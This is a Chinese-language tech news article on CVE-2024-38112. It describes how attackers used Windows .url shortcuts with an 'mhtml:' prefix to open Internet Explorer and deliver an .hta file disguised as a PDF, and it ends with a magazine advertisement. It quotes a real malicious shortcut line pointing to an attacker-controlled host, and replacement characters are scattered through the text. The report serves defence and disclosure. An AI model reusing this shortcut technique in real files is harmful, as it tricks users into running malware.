誰能想到��,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器,近日還能因漏洞被推上風口浪尖�?
全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里����,通過構建特殊的 Windows Internet 快捷方式文件(即 .url)���,引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL����,以此進行惡意攻擊。
據了解,這種漏洞甚至可以繞過 Windows 10��、Windows 11 系統的安全防護。
強制調用 IE 瀏覽器打開 URL
據悉�����,該漏洞由 CPR 研究人員發現�,追蹤編號為 CVE-2024-38112,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞��,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前)���,最晚可以追溯到 2024 年 5 月 13 日��。這表明�����,網絡罪犯使用這種攻擊技術已經有一段時間了?�!?/span>
通過對攻擊過程的詳細分析�,CPR 研究人員將該漏洞的實現分解為兩個步驟:
那么接下來����,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧����。
一般情況下�����,Internet 快捷方式文件(即 .url)是一個文本文件�����,里面包含各種配置信息,如顯示什么圖標����、雙擊時打開什么鏈接等�����。將其保存為 .url 文件并雙擊后,Windows 會在默認瀏覽器中打開這個 URL。
然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序��,以此強制用 IE 瀏覽器打開指定的 URL���。以下面這個惡意 .url 樣本為例:
可以看到�,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標�����。乍一看��,它似乎指向一個 PDF 文件,但實際上并非如此��。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com����;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。
它使用了一個特殊的前綴“mhtml:”。簡單說明一下 MHTML���,這是一種“聚合 HTML 文檔的 MIME 封裝”文件,是 IE 瀏覽器中引入的一種存儲文件技術,可將包括圖像在內的整個網頁封裝成一個單一檔案。
CPR 研究人員指出,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:
如果受害者想打開 PDF�,雙擊這個 .url 文件�����,然后便會彈出下面這個來自 IE 瀏覽器的窗口:
沒錯�,攻擊者使用 mhtml: URI 啟動 URL 后�,Windows 會自動在 IE 瀏覽器中啟動 URL,而不是默認瀏覽器。如文章開頭所說����,IE 瀏覽器早在 2022 年就退出歷史舞臺了��,在典型的 Windows 10/11 操作系統上,因其安全性不足,用戶一般無法直接用 IE 去訪問網站�����。
不過有一點需要明確:盡管 IE 已被微軟宣布“退役”�,但從技術上講�,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中���,微軟計劃至少支持該引擎到 2029 年。
因此�,攻擊者使用“mhtml”技巧�,讓本意想打開 PDF 的用戶���,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站�,尤其在 IE 下載惡意文件時安全警告也相對較少。
打開一個偽裝成 PDF 的惡意 .hta 文件
既然打開的不是 PDF��,那受害者通過 IE 打開的到底是什么呢�?
根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:
可一旦點擊了這個“Open”(默認選項)��,緊接著又會跳出另一個窗口:IE 保護模式下的警告提示��。
到了這一步���,如果用戶一直以為自己打開的不過是個 PDF�����,大概率會忽略這個警告,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件���。這是一個從 HTML 文檔中調用的可執行程序,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行����。
CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量�����,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串,這才是真正的(危險的)擴展名���?���!?/span>
但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序���。
一定要警惕從不可信來源發送的 .url 文件
據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現��。
于是�����,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞����。此后�����,雙方一直就此事密切合作�����,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)。
從通用漏洞評分系統(CVSS)來看,CVE-2024-38112 的評分為 7.5(滿分 10 分)���,屬于重要漏洞���,攻擊者需采取額外行動才能確保成功利用該漏洞�。而不論是微軟還是 CPR��,都強烈建議 Windows 用戶盡快更新該補丁���,因為根據調查顯示該漏洞已被黑客利用一年多了。
最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶�,我們建議一定要警惕從不可信來源發送的 .url 文件��,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功?!?/span>
參考鏈接:
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
大模型刷新一切�����,讓我們有著諸多的迷茫,AI 這股熱潮究竟會推著我們走向何方����?面對時不時一夜變天��,焦慮感油然而生,開發者怎么能夠更快、更系統地擁抱大模型?《新程序員 007》以「大模型時代,開發者的成長指南」為核心��,希望撥開層層迷霧�,讓開發者定下心地看到及擁抱未來。
讀過本書的開發者這樣感慨道:“讓我驚喜的是,中國還有這種高質量��、貼近開發者的雜志�����,我感到非常激動�。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容�,這些內容既真實又有價值。”
